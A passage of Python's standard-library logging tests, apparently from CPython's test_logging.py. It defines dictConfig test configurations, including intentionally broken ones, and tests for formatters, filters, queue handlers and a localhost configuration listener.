self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class CustomListener(logging.handlers.QueueListener):
pass
class CustomQueue(queue.Queue):
pass
def queueMaker():
return queue.Queue()
def listenerMaker(arg1, arg2, respect_handler_level=False):
def func(queue, *handlers, **kwargs):
kwargs.setdefault('respect_handler_level', respect_handler_level)
return CustomListener(queue, *handlers, **kwargs)
return func
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = warnings_helper.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
bad_format = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
config_queue_handler = {
'version': 1,
'handlers' : {
'h1' : {
'class': 'logging.FileHandler',
},
# key is before depended on handlers to test that deferred config works
'ah' : {
'class': 'logging.handlers.QueueHandler',
'handlers': ['h1']
},
},
"root": {
"level": "DEBUG",
"handlers": ["ah"]
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def check_handler(self, name, cls):
h = logging.getHandlerByName(name)
self.assertIsInstance(h, cls)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
self.check_handler('hand1', logging.StreamHandler)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
self.check_handler('hand1', CustomHandler)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
with self.check_no_resource_warning():
fn = make_temp_file(".log", "test_logging-X-")
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn,
"encoding": "utf-8",
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(closeFileHandler, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
threading_helper.join_thread(t)
@support.requires_working_socket()
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
self.check_handler('hand1', logging.StreamHandler)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@support.requires_working_socket()
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@support.requires_working_socket()
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_bad_format(self):
self.assertRaises(ValueError, self.apply_config, self.bad_format)
def test_bad_format_with_dollar_style(self):
config = copy.deepcopy(self.bad_format)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
self.assertEqual(sorted(logging.getHandlerNames()),
['bufferGlobal', 'fileGlobal'])
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raised as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
def test_config_callable_filter_works(self):
def filter_(_):
return 1
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_config_filter_works(self):
filter_ = logging.Filter("spam.eggs")
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_config_filter_method_works(self):
class FakeFilter:
def filter(self, _):
return 1
filter_ = FakeFilter()
self.apply_config({
"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}
})
assert logging.getLogger().filters[0] is filter_
logging.getLogger().filters = []
def test_invalid_type_raises(self):
class NotAFilter: pass
for filter_ in [None, 1, NotAFilter()]:
self.assertRaises(
ValueError,
self.apply_config,
{"version": 1, "root": {"level": "DEBUG", "filters": [filter_]}}
)
def do_queuehandler_configuration(self, qspec, lspec):
cd = copy.deepcopy(self.config_queue_handler)
fn = make_temp_file('.log', 'test_logging-cqh-')
cd['handlers']['h1']['filename'] = fn
if qspec is not None:
cd['handlers']['ah']['queue'] = qspec
if lspec is not None:
cd['handlers']['ah']['listener'] = lspec
qh = None
delay = 0.01
try:
self.apply_config(cd)
qh = logging.getHandlerByName('ah')
self.assertEqual(sorted(logging.getHandlerNames()), ['ah', 'h1'])
self.assertIsNotNone(qh.listener)
qh.listener.start()
logging.debug('foo')
logging.info('bar')
logging.warning('baz')
# Need to let the listener thread finish its work
deadline = time.monotonic() + support.LONG_TIMEOUT
while not qh.listener.queue.empty():
time.sleep(delay)
if time.monotonic() > deadline:
self.fail("queue not empty")
with open(fn, encoding='utf-8') as f:
data = f.read().splitlines()
self.assertEqual(data, ['foo', 'bar', 'baz'])
finally:
if qh:
qh.listener.stop()
h = logging.getHandlerByName('h1')
if h:
self.addCleanup(closeFileHandler, h, fn)
else:
self.addCleanup(os.remove, fn)
@threading_helper.requires_working_threading()
def test_config_queue_handler(self):
q = CustomQueue()
dq = {
'()': __name__ + '.CustomQueue',
'maxsize': 10
}
dl = {
'()': __name__ + '.listenerMaker',
'arg1': None,
'arg2': None,
'respect_handler_level': True
}
qvalues = (None, __name__ + '.queueMaker', __name__ + '.CustomQueue', dq, q)
lvalues = (None, __name__ + '.CustomListener', dl, CustomListener)
for qspec, lspec in itertools.product(qvalues, lvalues):
self.do_queuehandler_configuration(qspec, lspec)
# Some failure cases
qvalues = (None, 4, int, '', 'foo')
lvalues = (None, 4, int, '', 'bar')
for qspec, lspec in itertools.product(qvalues, lvalues):
if lspec is None and qspec is None:
continue
with self.assertRaises(ValueError) as ctx:
self.do_queuehandler_configuration(qspec, lspec)
msg = str(ctx.exception)
self.assertEqual(msg, "Unable to configure handler 'ah'")
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
